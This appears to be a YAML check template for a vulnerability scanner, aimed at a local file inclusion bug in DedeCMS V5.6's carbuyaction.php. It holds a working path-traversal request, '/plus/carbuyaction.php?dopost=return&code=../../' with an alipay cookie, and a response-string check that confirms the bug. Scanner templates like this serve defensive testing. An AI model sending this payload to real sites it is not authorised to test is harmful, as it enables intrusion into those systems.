product: DedeCMS
vName: DedeCMS V5.6 carbuyaction.php 本地文件包含
type: 文件包含
vID: [ ]
level: 3
vDesc: ''
version: DedeCmsV5.x
note: ''
search: { }
protocol: http
link: https://www.cnblogs.com/milantgh/p/3615986.html
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: true
      path: /plus/carbuyaction.php?dopost=return&code=../../
      header:
        Cookie: code=alipay
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - ytes("Cod::respond()
            logic: and